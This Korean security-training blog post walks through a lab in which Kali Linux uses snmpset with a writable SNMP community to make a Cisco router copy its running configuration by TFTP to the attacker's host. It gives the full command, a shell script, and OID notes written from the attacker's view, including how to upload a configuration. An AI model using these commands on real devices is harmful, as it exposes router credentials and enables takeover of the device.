본문 바로가기
NCS/기술적보안구축

Download router's configuration context through snmpset

장성한군사 2017. 10. 10. 17:28

 Map

 


Router setting 

enable

configure terminal

hostname IOU1

!

interface Loopback0

 ip address 1.1.1.1 255.255.255.255

!

interface Ethernet0/0

 ip address 10.1.4.254 255.255.255.0

 no shutdown

!

snmp-server community kgitbank RW 42

snmp-server community kgitbank1 RO

snmp-server trap-source Loopback0

snmp-server host 10.1.4.2 kgitbank 

!

access-list 42 permit 10.1.4.2


Kali Linux 

Start tftp daemon and verify the daemon status

# systemctl start atftpd

# netstat -anlu


Download router's configuration context to Router.cfg file on tftp server

router ip : 10.1.4.254 / kali linux 10.1.4.2 / oid값중 60은 임의의 값

 # snmpset -v 2c -c kgitbank 10.1.4.254 .1.3.6.1.4.1.9.9.96.1.1.1.1.2.60 i 1 .1.3.6.1.4.1.9.9.96.1.1.1.1.3.60 i 4 .1.3.6.1.4.1.9.9.96.1.1.1.1.4.60 i 1 .1.3.6.1.4.1.9.9.96.1.1.1.1.5.60 a "10.1.4.2" .1.3.6.1.4.1.9.9.96.1.1.1.1.6.60 s "Router.cfg" .1.3.6.1.4.1.9.9.96.1.1.1.1.14.60 i 1


Show context downloaded

# cat /srv/tftp/Router.cfg


We can execute as a script file. 

Save a snmp-walk.sh file after types including below lines.

 #!/bin/sh

NO=22

snmpset -v 2c -c kgitbank 10.1.4.254 .1.3.6.1.4.1.9.9.96.1.1.1.1.2.$NO i 1

snmpset -v 2c -c kgitbank 10.1.4.254 .1.3.6.1.4.1.9.9.96.1.1.1.1.3.$NO i 4

snmpset -v 2c -c kgitbank 10.1.4.254 .1.3.6.1.4.1.9.9.96.1.1.1.1.4.$NO i 1

snmpset -v 2c -c kgitbank 10.1.4.254 .1.3.6.1.4.1.9.9.96.1.1.1.1.5.$NO a "10.1.4.2"

snmpset -v 2c -c kgitbank 10.1.4.254 .1.3.6.1.4.1.9.9.96.1.1.1.1.6.$NO s "Router.cfg"

snmpset -v 2c -c kgitbank 10.1.4.254 .1.3.6.1.4.1.9.9.96.1.1.1.1.14.$NO i 1

각 OID에 대한 설명에서 N은 임의의 숫자를 의미한다. 


<ccCopyProtocol> 

1.3.6.1.4.1.9.9.96.1.1.1.1.2.N i 1

tftp(1), ftp(2), rcp(3), scp(4), sftp(5) 

라우터의 환경 설정파일을 upload/download할 대 사용할 프로토콜 지정하는데 사용한다. 

 

<ccCopySrouceFileType> 

1.3.6.1.4.1.9.9.96.1.1.1.1.3.N i 4

networkFile(1), iosfile(2), startupConfig(3), runningConfig(4), terminal(5) 

복사할 환경설정 파일의 타입을 지정하기 위해서 사용한다. 공격자의 입장에서 환경 설정 파일을 다운로드 하기 위해서는  

이 값을 3 또는 4로 지정하면 된다. 반대로 환경 설정 파일을 업로드 하기 위해서는 1로 설정한다. 

 

<ccCopyDestinationFileType> 

1.3.6.1.4.1.9.9.96.1.1.1.1.4.N i 1

networkFile(1), iosfile(2), startupConfig(3), runningConfig(4), terminal(5) 

복사할 파일을 어떤 형태로 저장할 것인지를 지정하기 위해서 사용한다. 공격자의 입장에서 환경 설정 파일을 다운로드  

하기 위해서는 이 값을 1로 지정하면 된다. 반대로 업로드 하기 위해서는 3 또는 4로 지정한다. 

 

<ccCopyServerAddress> 

1.3.6.1.4.1.9.9.96.1.1.1.1.5.N a 10.1.4.2

다운로드, 업로드에 사용할 서버의 IP주소를 입력한다. 공격자의 IP주소가 된다. 

 

<ccCopyServerFileName> 

1.3.6.1.4.1.9.9.96.1.1.1.1.6.N s "Router.cfg"

저장할 파일 이름 또는 복사할 파일 이름을 의미한다. 

 

<ccCopyEntryRowStatus> 

1.3.6.1.4.1.9.9.96.1.1.1.1.14.N i 4

active(1), nolnService(2), noReady(3), createAndGo(4), createAndWait(5), destroy(6) 

생성된 테이블의 상태를 의미, 1로 설정할 경우 기록된 대로 파일 복사가 수행된다. 

 

<ccCopyState> 

1.3.6.1.4.1.9.9.96.1.1.1.1.10.N 

waiting(1), running(2), success(3), failed(4) 

Upload/Download의 결과를 확인한다. 결과 값이 3이면 성공한 것이다.  


저작자표시 비영리 변경금지

'NCS/기술적보안구축' Related Articles

티스토리툴바